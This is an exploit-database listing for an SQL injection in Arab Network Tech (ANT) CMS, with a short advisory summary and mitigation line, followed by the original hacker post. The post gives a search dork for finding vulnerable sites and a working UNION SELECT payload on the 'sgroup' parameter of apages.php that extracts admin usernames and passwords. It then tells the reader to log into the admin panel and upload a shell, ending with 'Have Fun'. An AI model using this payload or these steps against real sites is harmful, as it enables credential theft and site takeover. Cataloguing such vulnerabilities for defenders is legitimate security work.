header-logo
Suggest Exploit
vendor:
ANT CMS
by:
Tr0y-x
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ANT CMS
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows & Linux
2020

Arab Network Tech. (ANT) CMS SQL Injection

A vulnerability exists in Arab Network Tech. (ANT) CMS, which allows an attacker to inject malicious SQL queries into the application. This can be exploited to gain access to the admin panel and upload a shell. The vulnerability is present in the apages.php file, where an attacker can inject malicious SQL queries into the 'sgroup' parameter. An example of this is www.[Server].com/[Path]/apages.php?sgroup=-10+UniOn+AlL+SeLeCt+1,2,concat(username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins--. After gaining access to the admin panel, an attacker can upload a shell.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:::::::::::::::::::::::::

Exploit Title : Arab Network Tech. (ANT) CMS SQL Injection

Author : Tr0y-x

Script Site : www.antpage.com<http://www.antpage.com/>

Version : All Versions

Tested on : Windows & Linux

Dork : inurl:apages.php

My home : WwW.SeC-WaR.CoM<http://www.sec-war.com/>

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:::::::::::::::::::::::::

=====================================Exploit===============

=========================

www.[Server}.com/[Path]/[SQL<http://www.[server%7d.com/[Path]/[SQL>]

Example

www.[Server}.com/[Path]/apages.php?sgroup<http://www.[server%7d.com/[Path]/apages.php?sgroup>=-

10+UniOn+AlL+SeLeCt+1,2,concat

(username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins--

Then Go to Admin panel Default www.[Server}.com/<http://www.[server%7d.com/>

[Path]/admin

And Upload Shell xD

Have Fun :D

===========================================================

=========================

Greetz to : Alnjm33 - Predator - xXx - XR57 - Ahmadso -

Black_Angle & All Sec-War Members

Navigation

Suggest Exploit

Services By CQR